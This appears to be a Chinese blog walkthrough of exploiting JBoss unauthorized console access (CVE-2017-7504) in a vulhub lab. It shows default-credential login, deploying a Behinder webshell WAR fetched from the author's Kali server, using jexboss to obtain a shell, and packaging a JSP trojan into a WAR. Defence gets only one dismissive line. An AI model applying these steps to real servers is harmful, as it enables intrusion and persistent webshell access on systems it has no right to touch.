1.JBOSS是什么
JBOSS是一個基於J2EE的開放源代碼的應用服務器。 JBoss代碼遵循LGPL許可,可以在任何商業應用中免費使用。JBoss是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3的規范。但JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。
2.JBOSS未授權訪問是什么
未授權訪問管理控制台,通過該漏洞,可以后台管理服務,可以通過腳本命令執行系統命令,如反彈shell,wget寫webshell文件。
3.漏洞環境搭建
漏洞環境:vulhub上的CVE-2017-7504
進入到CVE-2017-7504目錄執行docker-compose up -d
4.漏洞復現
說白了,這個未授權就是不需要用戶名和密碼就進入控制台,然后利用應用部署來部署war包,war包里有個jsp的馬,然后真香!!!
靶機的ip為192.168.66.134.
訪問192.168.66.134:8080,進入jboss。
進入控制台
看到如下界面,點擊紅色框選的:
網上的一些帖子說的是無用戶名和密碼登錄的,也就是說不需要密碼。但是我這里用vulhub搭建的居然需要用戶名和密碼,額,我人品的問題???隨便試了試,用戶名、密碼都是admin,進入控制台。
進入應用部署頁面
又點這個唄,進入應用部署界面。進入之后找到下面的部分:
上馬
ParamValue部分填寫遠程服務器上的木馬的地址。
這里用kali的apache2來弄,畢竟簡單。
進入kali,輸入service apache2 start
啟動apache2.(可以輸入service apache2 status
來看看是否開啟,下圖就是開啟狀態了)
然后便是將war包放在/var/www/html目錄,至於為啥放這里,請自行百度一哈。
我這里用的是冰蠍的bingxie.war。
然后就是在ParamValue處填寫地址了,我這里就填寫http://192.168.66.129/bingxie.war
注:192.168.66.129是kali的ip地址
然后就點Invoke。回顯一下頁面,就知道可以了。
去看看到底弄好沒,輸入http://192.168.66.134:8080/bingxie/
后面的bingxie就是前面部署的war包的名字
看到了shell.jsp,可以拿出冰蠍了。
5.jexboss工具
安裝方法:
git clone https://github.com/joaomatosf/jexboss
cd jexboss
python3 jexboss.py
出現以下界面便是能夠正常使用。
也可以輸入python3 jexboss.py -h
查看具體參數。
這里我是輸入:python3 jexboss.py -u 192.168.66.134:8080
執行命令后出現下面的界面就說明可以搞事情:
等執行完后會彈出個選擇yes or no,當然選yes。yes就是創建連接。
一輸入yes,我本機的火絨就搞事情了。。。
真就管的寬,不過我喜歡!!!
回到正題,輸入yes后,就會有個shell的命令行,舒服啊!
6.war的制作
首先你得有Java環境,然后進入jdk目錄下的bin目錄(例如C:\Program Files\Java\jdk1.8.0_101\bin),進入命令行。
輸入jar cvf shell.war shell.jsp
注:shell.war是你要做出了的war文件,shell.jsp是提前准備的jsp木馬文件
誒,弄完了。。。溜了溜了,防御啥的隨便找點文章看看,多的很。